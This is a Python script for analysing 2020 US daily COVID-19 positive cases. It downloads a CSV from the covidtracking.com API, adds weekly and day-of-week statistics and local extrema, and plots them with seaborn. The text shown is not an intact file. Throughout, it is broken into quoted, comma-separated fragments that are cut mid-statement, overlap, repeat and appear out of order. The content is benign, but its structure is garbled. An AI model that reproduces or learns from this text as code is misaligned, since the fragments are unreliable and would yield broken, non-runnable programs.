df = df.set_index('date') # Add", "df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug data frame. DEBUG and preview(df, add_columns.__name__) #", "an API. df = pd.read_csv(SOURCE_URL) # Save a copy of the extracted data.", "main(): df = extract_data() df = transform_data(df) visualize_data(df) # =========================================================================== # # MAIN", "of Cases') # Debug data frame. DEBUG and preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png')", "rename_columns.__name__) # Return data frame for reuse. return df # -- Data Processing:", "Rename columns. df.rename(columns=COLUMNS, inplace=True) # Save a copy of the processed data. df.to_csv(", "import seaborn as sns # =========================================================================== # # CONSTANTS # =========================================================================== # #", "plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df,", "size. sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)}, ) def summarize_by_dow(df: pd.DataFrame): fig = plt.figure()", "-> pd.DataFrame: # Rename columns. df.rename(columns=COLUMNS, inplace=True) # Save a copy of the", "-- Data Analytics -- # def plot_series(df: pd.DataFrame): fig = plt.figure() ax =", "Processing: Extract -- # def extract_data() -> pd.DataFrame: # Download source data as", "extrema columns. df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min, axis=1) # Save a", "Save a copy of the processed data. 
df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug", "'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', }, ) df = pd.merge( df, df_weekly, how='left',", ") ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day", "Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of Weekly Count of Cases')", "Set the default figure size. sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)}, ) def summarize_by_dow(df:", "and preview(df, visualize_data.__name__) # Return data frame for reuse. return df # --", "preview(df, visualize_data.__name__) # Return data frame for reuse. return df # -- Data", "return df def add_columns(df: pd.DataFrame): # Format date. df.date = pd.to_datetime(df.date, format='%Y%m%d') #", "summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111)", "Download source data as CSV from an API. df = pd.read_csv(SOURCE_URL) # Save", "ax.set_ylabel('Z-Score of Weekly Count of Cases') # Debug data frame. DEBUG and preview(df,", "preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure() ax =", "add_columns(df) # Debug data frame. DEBUG and preview(df, transform_data.__name__) # Return data frame", "exportable objects (classes, # functions, etc.) 
-- when performing a \"wild import\" (`from", "fig = plt.figure() ax = plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW, ) ax.set_title('COVID-19 |", "extract_data() df = transform_data(df) visualize_data(df) # =========================================================================== # # MAIN EXECUTION # ===========================================================================", "# -- Data -- # DAILY = 'daily' WEEKLY = 'weekly' COLUMNS =", "= plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 |", "'..') DATA_DIR = '../data' RESULTS_DIR = '../results' # -- URLs -- # SOURCE_URL", "return False def percent(num, denom): return 100 * num / denom def preview(df:", "'positiveIncrease': 'posIncrease', } DOW = [ 'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday',", "df['localMinimum'] = df.apply(local_min, axis=1) # Save a copy of the processed data. df.to_csv(", "Save a copy of the extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug", "plt.show() # Debug data frame. DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): #", "# # -- Main Program -- # # If this module is in", "# # METADATA # =========================================================================== # __author__ = 'Robert (Bob) <NAME>' __credits__ =", "df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add delta columns. df['day1LagDelta']", "f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug data frame. 
DEBUG and preview(df, rename_columns.__name__) # Return", "row['day1LagDelta'] > 0 and row['day1LeadDelta'] < 0: return True else: return False def", "Processing: Load -- # # -- Utilities -- # def lag_delta(series, period): return", "= df.index.week df['dow'] = df.index.day_name() df['dowIndex'] = df.index.dayofweek # Add group-summarization columns. df_weekly", "of Weekly Count of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_percent.__name__)", "New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of Weekly Count of Cases') #", "Processing: Transform -- # def transform_data(df: pd.DataFrame) -> pd.DataFrame: df = rename_columns(df) df", "-- # # If this module is in the main module, call the", "# =========================================================================== # # -- Data -- # DAILY = 'daily' WEEKLY =", "a copy of the extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug data", "Debug data frame. DEBUG and preview(df, summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame):", "0: return True else: return False def percent(num, denom): return 100 * num", "print(df.head(5)) def zScore(x, mean, std): return (x - mean) / std # --", "API. df = pd.read_csv(SOURCE_URL) # Save a copy of the extracted data. df.to_csv(", "df.index.month df['week'] = df.index.week df['dow'] = df.index.day_name() df['dowIndex'] = df.index.dayofweek # Add group-summarization", "is in the main module, call the main() function. if __name__ == '__main__':", "Analytics -- # def plot_series(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter(", "-- # def lag_delta(series, period): return series - series.shift(period) def lead_delta(series, period): return", "Define the module's API -- the list of exportable objects (classes, # functions,", "# Save a copy of the extracted data. 
df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) #", "data frame. DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use seaborn style", "}, ) df = pd.merge( df, df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease,", "of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug data frame. DEBUG", "frame. DEBUG and preview(df, visualize_data.__name__) # Return data frame for reuse. return df", "how='left', on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease,", "# =========================================================================== # # FUNCTIONS # =========================================================================== # # -- Data Analytics --", "= plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19 |", "return series.shift(-period) - series def local_max(row): if row['day1LagDelta'] > 0 and row['day1LeadDelta'] <", "# -- Main Program -- # def main(): df = extract_data() df =", "format='%Y%m%d') # Set the date as the DataFrame's index. df = df.set_index('date') #", "# =========================================================================== # # -- Data Analytics -- # def plot_series(df: pd.DataFrame): fig", "| Daily New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date() # plt.show() #", "def rename_columns(df: pd.DataFrame) -> pd.DataFrame: # Rename columns. df.rename(columns=COLUMNS, inplace=True) # Save a", "module's API -- the list of exportable objects (classes, # functions, etc.) --", "processing data and creating visual summaries for this study. 
\"\"\" # =========================================================================== #", "df.rename(columns=COLUMNS, inplace=True) # Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True,", "'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', } DOW = [ 'Sunday', 'Monday', 'Tuesday',", "USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Cases') #", "Return data frame for reuse. return df # -- Data Processing: Load --", "in the main module, call the main() function. if __name__ == '__main__': main()", "and preview(df, rename_columns.__name__) # Return data frame for reuse. return df # --", "index. df = df.set_index('date') # Add date-derived columns. df['date'] = df.index.date df['year'] =", "Set the date as the DataFrame's index. df = df.set_index('date') # Add date-derived", "def local_min(row): if row['day1LagDelta'] < 0 and row['day1LeadDelta'] > 0: return True else:", "the date as the DataFrame's index. df = df.set_index('date') # Add date-derived columns.", "data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug data frame. DEBUG and preview(df, extract_data.__name__)", "a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug data", "fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow',", "frame. DEBUG and preview(df, rename_columns.__name__) # Return data frame for reuse. return df", "type =', type(df).__name__) print(df.head(5)) def zScore(x, mean, std): return (x - mean) /", "frame for reuse. return df # -- Data Processing: Transform -- # def", "# Debug data frame. 
DEBUG and preview(df, rename_columns.__name__) # Return data frame for", "Python Standard Library -- # import os # -- 3rd Party -- #", "and row['day1LeadDelta'] > 0: return True else: return False def percent(num, denom): return", "Main Program -- # def main(): df = extract_data() df = transform_data(df) visualize_data(df)", "Data Processing: Transform -- # def transform_data(df: pd.DataFrame) -> pd.DataFrame: df = rename_columns(df)", "(Bob) <NAME>' __credits__ = ['Robert (Bob) <NAME>'] __created_date__ = 'Sep 16, 2020' __modified_date__", "as CSV from an API. df = pd.read_csv(SOURCE_URL) # Save a copy of", "'negIncrease', 'positiveIncrease': 'posIncrease', } DOW = [ 'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday',", "summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame. DEBUG and preview(df, visualize_data.__name__) # Return data", "and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use seaborn style defaults. Set the", ") # Debug data frame. DEBUG and preview(df, rename_columns.__name__) # Return data frame", "= lead_delta(df.posIncrease, 1) # Add local extrema columns. df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum']", "fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data", "for reuse. return df # -- Data Processing: Extract -- # def extract_data()", "# -- Data Analytics -- # def plot_series(df: pd.DataFrame): fig = plt.figure() ax", "-- 3rd Party -- # import matplotlib.dates as mpl_dates import matplotlib.pyplot as plt", "fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use seaborn style defaults. Set the default figure size.", ") # Add delta columns. 
df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1)", "# Debug data frame. DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use", "def transform_data(df: pd.DataFrame) -> pd.DataFrame: df = rename_columns(df) df = add_columns(df) # Debug", "-- # def transform_data(df: pd.DataFrame) -> pd.DataFrame: df = rename_columns(df) df = add_columns(df)", "data frame for reuse. return df # -- Data Processing: Extract -- #", "plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19 | Year", "frame. DEBUG and preview(df, extract_data.__name__) # Return data frame for reuse. return df", "-- URLs -- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # # FUNCTIONS #", "fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19", "style='darkgrid', rc={'figure.figsize': (16, 9)}, ) def summarize_by_dow(df: pd.DataFrame): fig = plt.figure() ax =", "Return data frame for reuse. return df # -- Data Processing: Transform --", "Week') ax.set_ylabel('Z-Score of Weekly Count of Cases') # Debug data frame. DEBUG and", "for reuse. return df def rename_columns(df: pd.DataFrame) -> pd.DataFrame: # Rename columns. df.rename(columns=COLUMNS,", ") df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) #", "- series def local_max(row): if row['day1LagDelta'] > 0 and row['day1LeadDelta'] < 0: return", "of the extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug data frame. 
DEBUG", "# def transform_data(df: pd.DataFrame) -> pd.DataFrame: df = rename_columns(df) df = add_columns(df) #", "df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add delta columns. df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta'] =", "series.shift(-period) - series def local_max(row): if row['day1LagDelta'] > 0 and row['day1LeadDelta'] < 0:", "df # -- Data Processing: Transform -- # def transform_data(df: pd.DataFrame) -> pd.DataFrame:", "=========================================================================== # # CONSTANTS # =========================================================================== # # -- Data -- # DAILY", "sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)}, ) def summarize_by_dow(df: pd.DataFrame): fig = plt.figure() ax", "of Local Maxima of Cases') # Debug data frame. DEBUG and preview(df, summarize_maxima.__name__)", "plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW, ) ax.set_title('COVID-19 | Year", "x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New", "= lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) # Add local extrema columns. df['localMaximum']", "visual summaries for this study. \"\"\" # =========================================================================== # # METADATA # ===========================================================================", "index=True, ) # Debug data frame. DEBUG and preview(df, rename_columns.__name__) # Return data", "# =========================================================================== # # -- Main Program -- # # If this module", "=========================================================================== # # -- Data Analytics -- # def plot_series(df: pd.DataFrame): fig =", "frame. 
DEBUG and preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date'))", "pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, )", "return df # -- Data Processing: Extract -- # def extract_data() -> pd.DataFrame:", "Return data frame for reuse. return df def rename_columns(df: pd.DataFrame) -> pd.DataFrame: #", "row['day1LeadDelta'] > 0: return True else: return False def percent(num, denom): return 100", "=========================================================================== # # IMPORTS # =========================================================================== # # -- Python Standard Library --", "# DEBUG = True # -- Filesytem -- # ROOT_DIR = os.path.join(os.getcwd(), '..')", "Maxima of Cases') # Debug data frame. DEBUG and preview(df, summarize_maxima.__name__) # plt.show()", "Debug data frame. DEBUG and preview(df, transform_data.__name__) # Return data frame for reuse.", "index=True, ) # Debug data frame. DEBUG and preview(df, add_columns.__name__) # Return data", "a \"wild import\" (`from field import *`). __all__ = [ 'DEBUG', ] #", "def summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease',", "denom): return 100 * num / denom def preview(df: pd.DataFrame, func_name: str): print(f'INSIDE", "of Cases') ax.xaxis_date() # plt.show() # Debug data frame. DEBUG and preview(df, plot_series.__name__)", "9)}, ) def summarize_by_dow(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df,", "preview(df, extract_data.__name__) # Return data frame for reuse. 
return df # -- Data", "func_name: str): print(f'INSIDE {func_name}(): type =', type(df).__name__) print(df.head(5)) def zScore(x, mean, std): return", "=========================================================================== # # METADATA # =========================================================================== # __author__ = 'Robert (Bob) <NAME>' __credits__", "df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add", "def set_figure_defaults(): # Use seaborn style defaults. Set the default figure size. sns.set(", "= pd.read_csv(SOURCE_URL) # Save a copy of the extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False,", "Debug data frame. DEBUG and preview(df, add_columns.__name__) # Return data frame for reuse.", "True # -- Filesytem -- # ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR = '../data'", "plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame. DEBUG and preview(df, visualize_data.__name__)", "and row['day1LeadDelta'] < 0: return True else: return False def local_min(row): if row['day1LagDelta']", "=========================================================================== # # -- Python Standard Library -- # import os # --", "Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Cases') # Debug data", "= add_columns(df) # Debug data frame. 
DEBUG and preview(df, transform_data.__name__) # Return data", "data=df, x='dow', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New", "pandas as pd import seaborn as sns # =========================================================================== # # CONSTANTS #", "Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of Weekly Count of Cases')", "visualize_data.__name__) # Return data frame for reuse. return df # -- Data Processing:", "frame. DEBUG and preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig =", "x='dow', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive", "def plot_series(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot(", "= 'daily' WEEKLY = 'weekly' COLUMNS = { 'positive': 'pos', 'negative': 'neg', 'negativeIncrease':", "* num / denom def preview(df: pd.DataFrame, func_name: str): print(f'INSIDE {func_name}(): type =',", "USA | Daily New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date() # plt.show()", "\"\"\" # =========================================================================== # # METADATA # =========================================================================== # __author__ = 'Robert (Bob)", "plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug", "of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png')", "data frame. DEBUG and preview(df, extract_data.__name__) # Return data frame for reuse. 
return", "-> pd.DataFrame: df = rename_columns(df) df = add_columns(df) # Debug data frame. DEBUG", "False def local_min(row): if row['day1LagDelta'] < 0 and row['day1LeadDelta'] > 0: return True", "DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use seaborn style defaults. Set", "creating visual summaries for this study. \"\"\" # =========================================================================== # # METADATA #", "Debug data frame. DEBUG and preview(df, visualize_data.__name__) # Return data frame for reuse.", "The main module for processing data and creating visual summaries for this study.", "series.shift(period) def lead_delta(series, period): return series.shift(-period) - series def local_max(row): if row['day1LagDelta'] >", "'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', ] # -- Debugging -- #", "= df.apply(local_min, axis=1) # Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv',", "ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Cases') # Debug data frame. DEBUG and preview(df,", "ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR = '../data' RESULTS_DIR = '../results' # -- URLs", "USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of Weekly Count", "= 'Sep 16, 2020' __modified_date__ = 'Sep 16, 2020' # =========================================================================== # #", "] # -- Debugging -- # DEBUG = True # -- Filesytem --", "# Debug data frame. 
DEBUG and preview(df, summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df:", "-- Data Processing: Transform -- # def transform_data(df: pd.DataFrame) -> pd.DataFrame: df =", "__author__ = 'Robert (Bob) <NAME>' __credits__ = ['Robert (Bob) <NAME>'] __created_date__ = 'Sep", "'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', }, ) df = pd.merge( df, df_weekly,", "=========================================================================== # __author__ = 'Robert (Bob) <NAME>' __credits__ = ['Robert (Bob) <NAME>'] __created_date__", "/ std # -- Main Program -- # def main(): df = extract_data()", "the extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug data frame. DEBUG and", "# -- URLs -- # SOURCE_URL = 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # # FUNCTIONS", "# plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot(", "# # -- Utilities -- # def lag_delta(series, period): return series - series.shift(period)", "sns # =========================================================================== # # CONSTANTS # =========================================================================== # # -- Data --", "\"\"\" main.py - The main module for processing data and creating visual summaries", "__created_date__ = 'Sep 16, 2020' __modified_date__ = 'Sep 16, 2020' # =========================================================================== #", "set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame. 
DEBUG and preview(df,", "= df.index.day_name() df['dowIndex'] = df.index.dayofweek # Add group-summarization columns. df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg(", "IMPORTS # =========================================================================== # # -- Python Standard Library -- # import os", "Program -- # def main(): df = extract_data() df = transform_data(df) visualize_data(df) #", "ax.xaxis_date() # plt.show() # Debug data frame. DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def", "'positive': 'pos', 'negative': 'neg', 'negativeIncrease': 'negIncrease', 'positiveIncrease': 'posIncrease', } DOW = [ 'Sunday',", "df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug data frame. DEBUG and preview(df, extract_data.__name__) #", "| Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of Weekly Count of", "df.apply(local_min, axis=1) # Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True,", "df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) # Add local extrema columns. df['localMaximum'] = df.apply(local_max, axis=1)", "Debug data frame. DEBUG and preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame):", "# METADATA # =========================================================================== # __author__ = 'Robert (Bob) <NAME>' __credits__ = ['Robert", "std # -- Main Program -- # def main(): df = extract_data() df", "of Week') ax.set_ylabel('Z-Score of Weekly Count of Cases') # Debug data frame. 
DEBUG", "-- # def extract_data() -> pd.DataFrame: # Download source data as CSV from", "def summarize_maxima(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW,", "100 * num / denom def preview(df: pd.DataFrame, func_name: str): print(f'INSIDE {func_name}(): type", "def summarize_by_dow(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease',", "# -- Filesytem -- # ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR = '../data' RESULTS_DIR", "percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add delta columns.", "ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19 | Year 2020", "num / denom def preview(df: pd.DataFrame, func_name: str): print(f'INSIDE {func_name}(): type =', type(df).__name__)", "<NAME>' __credits__ = ['Robert (Bob) <NAME>'] __created_date__ = 'Sep 16, 2020' __modified_date__ =", "Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of Weekly Count of Cases') # Debug", "> 0 and row['day1LeadDelta'] < 0: return True else: return False def local_min(row):", "# import matplotlib.dates as mpl_dates import matplotlib.pyplot as plt import pandas as pd", "=========================================================================== # # FUNCTIONS # =========================================================================== # # -- Data Analytics -- #", "# # -- Python Standard Library -- # import os # -- 3rd", "import os # -- 3rd Party -- # import matplotlib.dates as mpl_dates import", "1) df['day1LeadDelta'] = lead_delta(df.posIncrease, 1) # Add local extrema columns. 
df['localMaximum'] = df.apply(local_max,", "Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Local Maxima of Cases')", "and creating visual summaries for this study. \"\"\" # =========================================================================== # # METADATA", "DEBUG and preview(df, transform_data.__name__) # Return data frame for reuse. return df def", "| Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of", "reuse. return df def rename_columns(df: pd.DataFrame) -> pd.DataFrame: # Rename columns. df.rename(columns=COLUMNS, inplace=True)", "'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # # FUNCTIONS # =========================================================================== # # -- Data Analytics", "reuse. return df # -- Data Processing: Extract -- # def extract_data() ->", "Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Cases') # Debug data frame. DEBUG", "Count of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_zscore.__name__) # plt.show()", "as mpl_dates import matplotlib.pyplot as plt import pandas as pd import seaborn as", "# # MAIN EXECUTION # =========================================================================== # # -- Main Program -- #", "Debug data frame. 
DEBUG and preview(df, rename_columns.__name__) # Return data frame for reuse.", "return df # -- Data Processing: Transform -- # def transform_data(df: pd.DataFrame) ->", "pd import seaborn as sns # =========================================================================== # # CONSTANTS # =========================================================================== #", "fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19", "= 'Sep 16, 2020' # =========================================================================== # # EXPORTS # =========================================================================== # #", "data frame. DEBUG and preview(df, summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig", "matplotlib.pyplot as plt import pandas as pd import seaborn as sns # ===========================================================================", "df.index.year df['month'] = df.index.month df['week'] = df.index.week df['dow'] = df.index.day_name() df['dowIndex'] = df.index.dayofweek", "this module is in the main module, call the main() function. if __name__", "# ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR = '../data' RESULTS_DIR = '../results' # --", "= percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add delta", "if row['day1LagDelta'] < 0 and row['day1LeadDelta'] > 0: return True else: return False", "2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of", "CONSTANTS # =========================================================================== # # -- Data -- # DAILY = 'daily' WEEKLY", "# -- Debugging -- # DEBUG = True # -- Filesytem -- #", "Debug data frame. 
DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use seaborn", "ax.set_ylabel('Percent of Weekly Count of Cases') # Debug data frame. DEBUG and preview(df,", "data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug data frame. DEBUG and preview(df, add_columns.__name__)", "percent(num, denom): return 100 * num / denom def preview(df: pd.DataFrame, func_name: str):", "# Debug data frame. DEBUG and preview(df, visualize_data.__name__) # Return data frame for", "plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year", "= extract_data() df = transform_data(df) visualize_data(df) # =========================================================================== # # MAIN EXECUTION #", "Weekly Count of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_percent.__name__) #", "Library -- # import os # -- 3rd Party -- # import matplotlib.dates", "df.stdWeeklyPosIncrease, ) # Add delta columns. df['day1LagDelta'] = lag_delta(df.posIncrease, 1) df['day1LeadDelta'] = lead_delta(df.posIncrease,", "| USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Count of Local", "Return data frame for reuse. return df # -- Data Processing: Extract --", "ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of Weekly Count of Cases') # Debug data frame.", 